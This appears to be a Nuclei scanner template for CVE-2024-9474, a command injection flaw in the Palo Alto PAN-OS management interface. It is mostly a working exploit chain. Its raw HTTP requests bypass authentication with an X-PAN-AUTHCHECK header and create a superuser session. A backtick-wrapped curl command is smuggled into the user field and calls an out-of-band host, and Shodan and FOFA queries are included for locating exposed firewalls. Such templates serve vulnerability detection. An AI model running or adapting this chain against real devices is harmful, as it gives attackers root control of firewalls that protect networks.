A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
Cloud NGFW and Prisma Access are not impacted by this vulnerability.
PoC代码[已公开]
id: CVE-2024-9474
info:
name: PAN-OS Management Web Interface - Command Injection
author: watchTowr,iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
Cloud NGFW and Prisma Access are not impacted by this vulnerability.
impact: |
Authenticated administrators with access to the management web interface can escalate privileges to execute commands with root privileges on the PAN-OS firewall, achieving complete system control and bypassing security controls.
remediation: |
Apply security updates from Palo Alto Networks to address the privilege escalation and command injection vulnerability in the PAN-OS management web interface.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2024-9474
cwe-id: CWE-78
epss-score: 0.94184
epss-percentile: 0.99913
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: paloaltonetworks
product: pan-os
shodan-query:
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
- http.favicon.hash:"-631559155"
fofa-query: icon_hash="-631559155"
tags: cve,cve2024,panos,rce,kev,vkev,vuln
flow: http(1) && http(2) && http(3)
variables:
rand: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "0.0.0")'
- 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")'
condition: and
internal: true
- raw:
- |
POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1
matchers:
- type: word
part: body
words:
- "@start@PHPSESSID="
internal: true
extractors:
- type: regex
part: body
name: phpsessid
group: 1
regex:
- '@start@PHPSESSID=(.*?)@end@'
internal: true
- raw:
- |
GET /index.php/.js.map HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{phpsessid}}
X-PAN-AUTHCHECK: off
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "panos")'
condition: and
# digest: 4a0a004730450220773e84243e54447d093692492d5e6b620393fce282d979e976b2a73e80a6f07f0221008287029a8ea404e1a4e22b411676a9a2db194badaf7ceb5478772d7a558084d1:922c64590222798bb761d5b6d8e72950